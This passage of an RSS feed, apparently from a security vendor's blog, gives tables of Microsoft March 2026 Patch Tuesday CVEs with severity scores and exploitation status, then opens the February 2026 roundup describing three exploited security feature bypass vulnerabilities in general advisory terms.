Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23668">CVE-2026-23668</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25180">CVE-2026-25180</a></td><td><p>Windows Graphics Component Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24297">CVE-2026-24297</a></td><td><p>Windows Kerberos Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24287">CVE-2026-24287</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24289">CVE-2026-24289</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26132">CVE-2026-26132</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24288">CVE-2026-24288</a></td><td><p>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25175">CVE-2026-25175</a></td><td><p>Windows NTFS Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23669">CVE-2026-23669</a></td><td><p>Windows Print Spooler Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24290">CVE-2026-24290</a></td><td><p>Windows Projected File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23673">CVE-2026-23673</a></td><td><p>Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25172">CVE-2026-25172</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25173">CVE-2026-25173</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26111">CVE-2026-26111</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25185">CVE-2026-25185</a></td><td><p>Windows Shell Link Processing Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24294">CVE-2026-24294</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26128">CVE-2026-26128</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25166">CVE-2026-25166</a></td><td><p>Windows System Image Manager Assessment and Deployment Kit (ADK) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25188">CVE-2026-25188</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23672">CVE-2026-23672</a></td><td><p>Windows Universal Disk Format File System Driver (UDFS) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25187">CVE-2026-25187</a></td><td><p>Winlogon Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26144">CVE-2026-26144</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26112">CVE-2026-26112</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26107">CVE-2026-26107</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26108">CVE-2026-26108</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26109">CVE-2026-26109</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26134">CVE-2026-26134</a></td><td><p>Microsoft Office Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26113">CVE-2026-26113</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26110">CVE-2026-26110</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26114">CVE-2026-26114</a></td><td><p>Microsoft SharePoint Server Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26106">CVE-2026-26106</a></td><td><p>Microsoft SharePoint Server Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26105">CVE-2026-26105</a></td><td><p>Microsoft SharePoint Server Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24285">CVE-2026-24285</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25180">CVE-2026-25180</a></td><td><p>Windows Graphics Component Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3>Open Source Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26030">CVE-2026-26030</a></td><td><p>GitHub: CVE-2026-26030 Microsoft Semantic Kernel InMemoryVectorStore filter functionality vulnerable</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23654">CVE-2026-23654</a></td><td><p>GitHub: Zero Shot SCFoundation Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21262">CVE-2026-21262</a></td><td><p>SQL Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26115">CVE-2026-26115</a></td><td><p>SQL Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26116">CVE-2026-26116</a></td><td><p>SQL Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>System Center vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20967">CVE-2026-20967</a></td><td><p>System Center Operations Manager (SCOM) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25177">CVE-2026-25177</a></td><td><p>Active Directory Domain Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23667">CVE-2026-23667</a></td><td><p>Broadcast DVR Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25190">CVE-2026-25190</a></td><td><p>GDI Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25181">CVE-2026-25181</a></td><td><p>GDI+ Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23674">CVE-2026-23674</a></td><td><p>MapUrlToZone Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25167">CVE-2026-25167</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24283">CVE-2026-24283</a></td><td><p>Multiple UNC Provider Kernel Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25165">CVE-2026-25165</a></td><td><p>Performance Counters for Windows Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24282">CVE-2026-24282</a></td><td><p>Push message Routing Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24285">CVE-2026-24285</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24291">CVE-2026-24291</a></td><td><p>Windows Accessibility Infrastructure (ATBroker.exe) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25186">CVE-2026-25186</a></td><td><p>Windows Accessibility Infrastructure (ATBroker.exe) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24293">CVE-2026-24293</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25176">CVE-2026-25176</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25178">CVE-2026-25178</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25179">CVE-2026-25179</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23656">CVE-2026-23656</a></td><td><p>Windows App Installer Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25171">CVE-2026-25171</a></td><td><p>Windows Authentication Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23671">CVE-2026-23671</a></td><td><p>Windows Bluetooth RFCOM Protocol Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24292">CVE-2026-24292</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24295">CVE-2026-24295</a></td><td><p>Windows Device Association Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24296">CVE-2026-24296</a></td><td><p>Windows Device Association Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25189">CVE-2026-25189</a></td><td><p>Windows DWM Core Library Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25174">CVE-2026-25174</a></td><td><p>Windows Extensible File Allocation Table Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25168">CVE-2026-25168</a></td><td><p>Windows Graphics Component Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25169">CVE-2026-25169</a></td><td><p>Windows Graphics Component Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23668">CVE-2026-23668</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25180">CVE-2026-25180</a></td><td><p>Windows Graphics Component Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25170">CVE-2026-25170</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24297">CVE-2026-24297</a></td><td><p>Windows Kerberos Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24287">CVE-2026-24287</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24289">CVE-2026-24289</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26132">CVE-2026-26132</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24288">CVE-2026-24288</a></td><td><p>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25175">CVE-2026-25175</a></td><td><p>Windows NTFS Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23669">CVE-2026-23669</a></td><td><p>Windows Print Spooler Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24290">CVE-2026-24290</a></td><td><p>Windows Projected File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23673">CVE-2026-23673</a></td><td><p>Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25172">CVE-2026-25172</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25173">CVE-2026-25173</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26111">CVE-2026-26111</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25185">CVE-2026-25185</a></td><td><p>Windows Shell Link Processing Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24294">CVE-2026-24294</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26128">CVE-2026-26128</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25166">CVE-2026-25166</a></td><td><p>Windows System Image Manager Assessment and Deployment Kit (ADK) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25188">CVE-2026-25188</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23672">CVE-2026-23672</a></td><td><p>Windows Universal Disk Format File System Driver (UDFS) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25187">CVE-2026-25187</a></td><td><p>Winlogon Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h2>Zero-Day Vulnerabilities: Publicly Disclosed (No known exploitation)</h2><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26127">CVE-2026-26127</a></td><td><p>.NET Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>Yes</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21262">CVE-2026-21262</a></td><td><p>SQL Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr></tbody></table><h2>Update history</h2><ul><li><strong>2026-03-16</strong>: updated section on CVE-2026-26123 to include researcher commentary.</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-march-2026</link>
      <guid isPermaLink="false">bltd49b8964fd0a467e</guid>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Patch Tuesday]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 10 Mar 2026 20:30:36 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - February 2026]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is publishing 55 vulnerabilities this </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Feb"><span style='font-size: undefined;'>February 2026 Patch Tuesday</span></a><span style='font-size: undefined;'>. Microsoft is aware of exploitation in the wild for six of today’s vulnerabilities, and notes public disclosure for three of those. Earlier in the month, Microsoft provided patches to address three browser vulnerabilities, which are not included in the Patch Tuesday count above.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows/Office triple trouble: zero-day security feature bypass vulns</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>All three of the publicly disclosed zero-day vulnerabilities published today are security feature bypasses, and Microsoft acknowledges the same cast of reporters in each case.</span></p><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21510"><span style='font-size: undefined;'>CVE-2026-21510</span></a><span style='font-size: undefined;'> describes a zero-day Windows Shell security feature bypass vulnerability which is already exploited in the wild. Not to be confused with PowerShell, most people will use the Windows Shell without ever learning its name or even really contemplating its existence. The Windows Shell is Microsoft’s term for the GUI interaction logic for the entire OS provided by explorer.exe and associated libraries and APIs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-21510 provides an attacker with a way to dodge those pesky Smart Screen or other “are you sure?” prompts. The advisory sets out that “an attacker must convince a user to open a malicious link or shortcut file”. We could parse this wording more than one way, and while shortcut files with a .lnk extension are certainly a prime suspect here, it’s possible that .url files might also be a vector.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The venerable MSHTML/Trident web rendering engine is still present in Windows as a daily driver for Office and Explorer, many years after most people stopped using Internet Explorer.  Accordingly, every so often Microsoft has to patch another zero-day vulnerability in the browser it can’t quite bring itself to rip out of its flagship operating system. Today’s example is </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21513"><span style='font-size: undefined;'>CVE-2026-21513</span></a><span style='font-size: undefined;'>, a security feature bypass which starts with the attacker convincing a user to open a malicious HTML file or shortcut file.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>If good things come in threes, then perhaps </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21514"><span style='font-size: undefined;'>CVE-2026-21514</span></a><span style='font-size: undefined;'> makes security bypass zero-day vulnerabilities a good thing. Exploitation involves bypassing Object Linking & Embedding (OLE) mitigations by convincing the user to open a malicious Word document. The advisory only lists remediations for LTSC versions of Office and on-prem Microsoft 365 Apps for Enterprise, without mentioning the standard Microsoft 365 suite.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It’s curious that Microsoft has evaluated the attack vector for CVE-2026-21514 as local, because MSRC typically assesses any vulnerability which boils down to “remote attacker tricks user into opening malicious payload” as a remote attack, based on the location of the attacker. However, the advisory specifically calls out that “reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.” It’s not clear whether this is a deviation from prior practice by MSRC, an inadvertent mis-assessment, or an unusual-but-correct assessment of an attack vector that relies on details which Microsoft has not made public. 